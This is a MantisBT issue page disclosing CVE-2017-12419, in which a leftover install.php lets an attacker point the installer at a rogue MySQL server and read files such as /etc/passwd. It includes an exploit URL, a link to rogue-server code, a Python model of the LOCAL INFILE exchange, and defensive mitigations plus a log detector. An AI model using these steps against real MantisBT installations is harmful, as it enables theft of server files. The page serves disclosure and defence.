View Issue Details

ID: 0023173
Project: mantisbt
Category: installation
View Status: public
Last Update: 2017-08-04 19:35
Reporter: iamsecurity
Assigned To:
Priority: normal
Severity: crash
Reproducibility: always
Status: confirmed
Resolution: open
Product Version:
Target Version:
Fixed in Version:
Summary: 0023173: CVE-2017-12419: Arbitrary File Read inside install.php script
Description

After successful installation of the bug tracker, the install.php script is not removed; because of that, an attacker can read any file on the remote system through some of the installation process steps.
The problem is complex and exists inside the MySQL server and the PHP-to-MySQL drivers. You can read the full details in my blog article: http://russiansecurity.expert/2016/04/20/mysql-connect-file-read/

Steps To Reproduce

For successful exploitation, you need to run a special rogue MySQL server and connect to it from the server where you want to read files. Unfortunately, Mantis allows that.
You can find the server in my repository: https://github.com/allyshka/Rogue-MySql-Server/blob/master/roguemysql.php

An attacker can go to any step of the installation process.
See this part of the code:

/admin/install.php:

86: # install_state
87: #   0 = no checks done
88: #   1 = server ok, get database information
89: #   2 = check the database information
90: #   3 = install the database
...
95: $t_install_state = gpc_get_int( 'install', 0 );

If you browse to the URL https://mantisbt/admin/install.php?install=3, you go to the "install the database" section, where you find this part of the code:

/admin/install.php:

745: # all checks have passed, install the database
746: if( 3 == $t_install_state ) {
...
765:    <?php
766:        $t_result = @$g_db->Connect( $f_hostname, $f_admin_username, $f_admin_password, $f_database_name );
767: 
768:        $t_db_open = false;

The script tries to connect to the MySQL server, but you can control the $f_hostname variable through the HTTP request parameter hostname:

/admin/install.php:

200:    $f_hostname           = gpc_get( 'hostname', config_get( 'hostname', 'localhost' ) );

https://mantis/admin/install.php?install=3&hostname=127.0.0.1
For testing purposes, I'm trying to read /etc/passwd:

Additional Information

This issue potentially affects ALL MantisBT versions running on MySQL / MariaDB, unless they have disabled local_infile.
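The exchange the rogue server relies on, modelled in Python as an added example. This is not MantisBT code and not the roguemysql.php linked above; the packet layouts follow the public MySQL client/server protocol, and every "client" byte string (the handshake responses, the query, the uploaded /etc/passwd line) is constructed by hand rather than captured from a real driver. The point it makes is that the server never needs the client's credentials or its query text: it answers the first COM_QUERY with a LOCAL INFILE Request naming a file, and a client that advertised CLIENT_LOCAL_FILES uploads it. A client that does not advertise the flag (which is what mysqli.allow_local_infile = 0, discussed further down the thread, produces) gets nothing.

```python
"""Model of the MySQL client/server exchange a rogue server abuses.

Added example: neither MantisBT code nor the roguemysql.php linked from the
report. Packet layouts follow the public MySQL client/server protocol
(handshake protocol version 10); all "client" bytes are constructed here.
"""
import struct

CLIENT_LONG_PASSWORD = 0x00000001
CLIENT_LOCAL_FILES = 0x00000080       # client is willing to send local files
CLIENT_PROTOCOL_41 = 0x00000200
CLIENT_SECURE_CONNECTION = 0x00008000
LOCAL_INFILE_REQUEST = 0xFB           # first byte of a LOCAL INFILE Request


def packet(seq: int, payload: bytes) -> bytes:
    """Frame a payload: 3-byte little-endian length, 1-byte sequence id."""
    return struct.pack("<I", len(payload))[:3] + bytes([seq & 0xFF]) + payload


def split_packets(stream: bytes) -> list:
    """Split a byte stream into (sequence id, payload) frames."""
    frames, pos = [], 0
    while pos + 4 <= len(stream):
        length = int.from_bytes(stream[pos:pos + 3], "little")
        payload = stream[pos + 4:pos + 4 + length]
        if len(payload) != length:
            raise ValueError("truncated packet")
        frames.append((stream[pos + 3], payload))
        pos += 4 + length
    if pos != len(stream):
        raise ValueError("trailing bytes after last packet")
    return frames


def handshake(server_version: bytes = b"5.7.0-rogue", scramble: bytes = b"\x00" * 20) -> bytes:
    """Initial Handshake Packet (v10) that advertises CLIENT_LOCAL_FILES."""
    caps = (CLIENT_LONG_PASSWORD | CLIENT_LOCAL_FILES
            | CLIENT_PROTOCOL_41 | CLIENT_SECURE_CONNECTION)
    body = (b"\x0a" + server_version + b"\x00"
            + struct.pack("<I", 1)               # connection id
            + scramble[:8] + b"\x00"             # auth-plugin-data part 1, filler
            + struct.pack("<H", caps & 0xFFFF)   # capability flags, low 16 bits
            + b"\x21"                            # character set: utf8_general_ci
            + struct.pack("<H", 0x0002)          # status: SERVER_STATUS_AUTOCOMMIT
            + struct.pack("<H", caps >> 16)      # capability flags, high 16 bits
            + b"\x00"                            # auth plugin data len (no CLIENT_PLUGIN_AUTH)
            + b"\x00" * 10                       # reserved
            + scramble[8:20] + b"\x00")          # auth-plugin-data part 2 (13 bytes)
    return packet(0, body)


def ok_packet() -> bytes:
    """OK_Packet: header 0x00, 0 affected rows, 0 last insert id, status, warnings."""
    return b"\x00\x00\x00" + struct.pack("<HH", 0x0002, 0)


def client_allows_local_files(handshake_response: bytes) -> bool:
    """HandshakeResponse41 opens with the client's 4-byte capability flags."""
    return bool(struct.unpack("<I", handshake_response[:4])[0] & CLIENT_LOCAL_FILES)


def collect_uploaded_file(stream: bytes) -> bytes:
    """Reassemble the file the client streams after a LOCAL INFILE Request.

    The client sends the contents in one or more packets and ends the
    upload with an empty packet.
    """
    data = bytearray()
    for _, payload in split_packets(stream):
        if payload == b"":
            return bytes(data)
        data += payload
    raise ValueError("upload not terminated by an empty packet")


def rogue_server_exchange(handshake_response: bytes, query: bytes,
                          upload: bytes, wanted: bytes = b"/etc/passwd"):
    """Play the server side over pre-recorded client bytes.

    Returns (bytes the server sent, recovered file content or None). The
    rogue server accepts any credentials and answers the client's first
    COM_QUERY, whatever its text, with a request for `wanted`.
    """
    sent = handshake()
    if not client_allows_local_files(handshake_response):
        return sent, None                      # mysqli.allow_local_infile=0 lands here
    sent += packet(2, ok_packet())             # "login" succeeded
    if query[:1] != b"\x03":                   # COM_QUERY
        raise ValueError("expected COM_QUERY")
    sent += packet(1, LOCAL_INFILE_REQUEST.to_bytes(1, "big") + wanted)
    return sent, collect_uploaded_file(upload)


# Constructed client traffic. The 4 leading bytes of a HandshakeResponse41 are
# its capability flags; the rest is max packet size, charset, reserved bytes
# and the user name.
_RESPONSE_TAIL = struct.pack("<I", 1 << 24) + b"\x21" + b"\x00" * 23 + b"root\x00"
RESPONSE_LOCAL_FILES_ON = struct.pack(
    "<I", CLIENT_PROTOCOL_41 | CLIENT_SECURE_CONNECTION | CLIENT_LOCAL_FILES) + _RESPONSE_TAIL
RESPONSE_LOCAL_FILES_OFF = struct.pack(
    "<I", CLIENT_PROTOCOL_41 | CLIENT_SECURE_CONNECTION) + _RESPONSE_TAIL
FIRST_QUERY = b"\x03SELECT 1"                          # any query the installer runs
SAMPLE_PASSWD = b"root:x:0:0:root:/root:/bin/bash\n"   # constructed file content
UPLOAD = packet(2, SAMPLE_PASSWD) + packet(3, b"")

if __name__ == "__main__":
    for resp in (RESPONSE_LOCAL_FILES_ON, RESPONSE_LOCAL_FILES_OFF):
        _, content = rogue_server_exchange(resp, FIRST_QUERY, UPLOAD)
        print("CLIENT_LOCAL_FILES set:", client_allows_local_files(resp), "leaked:", content)
```

rogue_server_exchange() returns the bytes a real rogue server would write to the socket together with whatever the client handed back. Two things carry over to the real attack: the server reply to the query is the only step that matters, so the installer's actual SQL is irrelevant, and the defence lives on the client side, in the capability flag the driver sends during the handshake.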

Tags: No tags attached.

Relationships

related to 0023179 (resolved, dregad): Login page no longer warns about 'admin' directory being present
parent of 0023185 (resolved, dregad): Improve doc and notifications when admin dir is present (CVE-2017-12419)

Activities

iamsecurity
2017-08-01 00:46
reporter

etc-passwd-read.jpg (204,126 bytes)
dregad
2017-08-01 06:30
developer   ~0057370
Last edited: 2017-08-01 06:30

Thanks for your report.

As per documentation, after installation the administrator is expected to delete the admin/ directory:

2. Delete the admin folder
For security reasons, the scripts within this directory should not be accessible on a 
live MantisBT site or on any installation that is accessible via the Internet.
Once you have confirmed that the install/upgrade was successful, you should delete this directory 

It would also be the admin's responsibility to prevent local file lookup in their MySQL setup (see the MySQL documentation).

I'm not sure if or how we can actually prevent such attack from MantisBT code though. If you have any ideas please let me know.

dregad

2017-08-03 18:40

developer   ~0057385

I can confirm the exploit, which I just tested on my dev box.

Problem is, short of rewriting the whole installer to not rely on GPC parameters to control its state (which is not something I have the bandwidth for right now), I don't know how we could fix it.

As a stopgap measure, I'll improve the documentation, system checks and warnings to better advise administrators of the vulnerability and potential risk.

dregad

2017-08-03 19:27

developer   ~0057386

@iamsecurity, after a bit of research, I found that by setting mysqli.allow_local_infile = 0 in php.ini, the rogue server is no longer able to retrieve local files. Can you please confirm?

dregad

2017-08-04 03:30

developer   ~0057388

MITRE assigned CVE-2017-12419 to this issue [scr370826]

iamsecurity

2017-08-04 04:32

reporter   ~0057390

@dregad I've checked your fix and it's working for the mysqli driver. Thanks for the research. The PDO drivers have LOAD LOCAL disabled by default.

The documentation has good security recommendations about deleting the admin folder, but in my practice I find many Mantis installations where the admin folder still exists.
I'm thinking about some install.lock file: if it exists, then the install.php script will not work.

dregad

2017-08-04 05:38

developer   ~0057391

Thanks for your feedback.

in my practice I find many Mantis installations where the admin folder still exists

That's true unfortunately; but we can only do so much and system administrators also need to take their responsibilities at some point.

It's worth mentioning that a warning about existence of admin directory used to be shown on login page in older versions of Mantis, but it was removed probably by mistake in 1.3.0 (see 0023179); this will be fixed in the next release, and should encourage administrators to do something about it.

I'm thinking about some install.lock file: if it exists, then the install.php script will not work.

That's an interesting approach. The problem is that we may not have write access to the file system, in which case the file would have to be created by the admin, so we're back to square one.
Anyway I'll keep that in mind and discuss the idea with other dev's, we'll see how we could implement it.

dregad

2017-08-04 18:57

developer   ~0057394

I just pushed several commits to improve the documentation and notifications to administrators about the presence of the admin directory, which hopefully increase awareness about the issue and thus lower the risk of people being vulnerable without knowing it.

I will leave this issue open, since it is not fixed from a Mantis perspective (we rely on user action to protect themselves).
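Since the project's position is that administrators must protect themselves, the complementary control on the operations side is to watch for the access pattern the report shows. The Python below is an added example, not MantisBT code: it scans web server access lines in the Apache combined format for any hit under /admin/ and singles out install.php requests whose hostname parameter points at a database host other than the deployment's own. The log lines are constructed to mirror the URL quoted in the report; the allowlist of legitimate database hosts is an assumption that each deployment has to fill in.

```python
"""Flag access-log evidence of the install.php abuse described in this issue.

Added example, not MantisBT code. The log lines are constructed in the
Apache combined format; the allowlist of legitimate database hosts is an
assumption each deployment has to supply.
"""
import re
from urllib.parse import parse_qs, urlsplit

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) ')


def classify_request(target: str, allowed_db_hosts) -> str:
    """Return a finding label for one request target, or "" if benign.

    Any hit under /admin/ on a live site is worth a look; a hit on
    install.php whose hostname parameter names something other than the
    real database host is the pattern from the report.
    """
    parts = urlsplit(target)
    if "/admin/" not in parts.path:
        return ""
    if not parts.path.endswith("/admin/install.php"):
        return "admin_dir_access"
    params = parse_qs(parts.query)
    if "hostname" in params:
        # A host:port value is assumed possible; only the host part is compared.
        host = params["hostname"][0].split(":")[0].lower()
        if host not in allowed_db_hosts:
            return "installer_foreign_db_host"
    return "installer_access"


def scan_access_log(lines, allowed_db_hosts=("localhost", "127.0.0.1")):
    """Return one finding per suspicious line: ip, time, kind, target, status."""
    allowed = {h.lower() for h in allowed_db_hosts}
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue                # not combined format; skip rather than guess
        kind = classify_request(m["target"], allowed)
        if kind:
            findings.append({"ip": m["ip"], "time": m["ts"], "kind": kind,
                             "target": m["target"], "status": int(m["status"])})
    return findings


# Constructed sample, modelled on the URL quoted in the report.
SAMPLE_LOG = [
    '203.0.113.7 - - [01/Aug/2017:00:40:12 +0000] "GET /admin/install.php?install=3'
    '&hostname=203.0.113.7&admin_username=root&admin_password=x HTTP/1.1" 200 5120 "-" "curl/7.52.1"',
    '203.0.113.7 - - [01/Aug/2017:00:41:03 +0000] "GET /admin/check/index.php HTTP/1.1" 200 9000 "-" "curl/7.52.1"',
    '198.51.100.2 - - [01/Aug/2017:00:42:00 +0000] "GET /admin/install.php?install=3&hostname=127.0.0.1 HTTP/1.1" 200 5100 "-" "Mozilla/5.0"',
    '192.0.2.5 - - [01/Aug/2017:00:43:00 +0000] "GET /view_all_bug_page.php HTTP/1.1" 200 12000 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for f in scan_access_log(SAMPLE_LOG):
        print(f"{f['time']} {f['ip']} {f['kind']}: {f['target']}")
```

One caveat: the installer accepts its parameters from POST as well as GET, and POST bodies never reach the access log, so a plain "installer_access" or "admin_dir_access" finding on a site that finished installing long ago deserves the same attention as the explicit foreign-host case.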

Related Changesets

MantisBT: master-2.5 d6d7dc2d

2017-08-03 16:54:04

dregad

Restore "admin dir" warning on login page

Commit 9da643a6f6c1b7604598968baa3cd2f6fd4540ff modified the admin
checks on login page to remove the logic checking for pre 1.0 upgrade
steps.

However, it also (probably unintentionally) removed the check for admin
directory presence, so administrators are no longer reminded that they
should delete this directory, potentially leaving them exposed to
security breaches.

This commit restores the warning, and improves the error message.

Fixes 0023179
Stopgap measure for issue 0023173
mod - lang/strings_english.txt
mod - login_page.php

MantisBT: master-1.3.x 21a15b88

2017-08-03 16:54:04

dregad

Restore "admin dir" warning on login page

Commit 9da643a6f6c1b7604598968baa3cd2f6fd4540ff modified the admin
checks on login page to remove the logic checking for pre 1.0 upgrade
steps.

However, it also (probably unintentionally) removed the check for admin
directory presence, so administrators are no longer reminded that they
should delete this directory, potentially leaving them exposed to
security breaches.

This commit restores the warning, and improves the error message.

Fixes 0023179
Stopgap measure for issue 0023173

Backported from master-2.5 branch d6d7dc2dc7473637c8ac17a78c0374f16981f409
mod - lang/strings_english.txt
mod - login_page.php

MantisBT: master-2.5 3a7c6f75

2017-08-03 19:39:40

dregad

Improve admin information about CVE-2017-12419

- Add admin check for mysqli.allow_local_infile
- Add reminder to remove admin dir at end of Admin checks
- Improve post-install tasks section of Admin Guide: add explicit
warning about potential consequences of not deleting the admin
directory, more descriptive wording.

Stopgap measures for issue 0023173
mod - admin/check/check_database_inc.php
mod - admin/check/index.php
mod - docbook/Admin_Guide/en-US/Installation.xml

MantisBT: master-1.3.x 10211c90

2017-08-04 17:45:55

dregad

Improve admin information about CVE-2017-12419

- Add admin check for mysqli.allow_local_infile
- Add reminder to remove admin dir at end of Admin checks
- Improve post-install tasks section of Admin Guide: add explicit
warning about potential consequences of not deleting the admin
directory, more descriptive wording.

Stopgap measures for issue 0023173

Backported from master-2.5 branch 3a7c6f75bf3c4bc0856ebffe388df9e46ac10e5d

Conflicts:
admin/check/index.php
mod - admin/check/check_database_inc.php
mod - admin/check/index.php
mod - docbook/Admin_Guide/en-US/Installation.xml

Issue History

Date Modified Username Field Change
2017-08-01 00:46 iamsecurity New Issue
2017-08-01 00:46 iamsecurity File Added: etc-passwd-read.jpg
2017-08-01 06:30 dregad Assigned To => dregad
2017-08-01 06:30 dregad Status new => acknowledged
2017-08-01 06:30 dregad Note Added: 0057370
2017-08-01 06:30 dregad Note Edited: 0057370
2017-08-03 18:40 dregad Assigned To dregad =>
2017-08-03 18:40 dregad Status acknowledged => confirmed
2017-08-03 18:40 dregad Note Added: 0057385
2017-08-03 19:27 dregad Note Added: 0057386
2017-08-04 03:30 dregad Summary Arbitrary File Read inside install.php script => CVE-2017-12419: Arbitrary File Read inside install.php script
2017-08-04 03:30 dregad Note Added: 0057388
2017-08-04 04:32 iamsecurity Note Added: 0057390
2017-08-04 05:38 dregad Note Added: 0057391
2017-08-04 18:17 dregad Changeset attached => MantisBT master-2.5 d6d7dc2d
2017-08-04 18:17 dregad Changeset attached => MantisBT master-2.5 3a7c6f75
2017-08-04 18:17 dregad Changeset attached => MantisBT master-1.3.x 21a15b88
2017-08-04 18:17 dregad Changeset attached => MantisBT master-1.3.x 10211c90
2017-08-04 18:57 dregad Note Added: 0057394
2017-08-04 18:57 dregad View Status private => public
2017-08-04 18:59 dregad Product Version 2.5.1 =>
2017-08-04 18:59 dregad Steps to Reproduce Updated
2017-08-04 18:59 dregad Additional Information Updated
2017-08-04 19:00 dregad Relationship added related to 0023181
2017-08-04 19:00 dregad Relationship added related to 0023179
2017-08-04 19:00 dregad Relationship deleted related to 0023181
2017-08-04 19:24 dregad Relationship added parent of 0023185
2017-08-04 19:29 dregad Note View State: 0057390: public
2017-08-04 19:32 dregad Relationship replaced related to 0023185
2017-08-04 19:33 dregad Relationship deleted related to 0023185
2017-08-04 19:35 dregad Relationship added parent of 0023185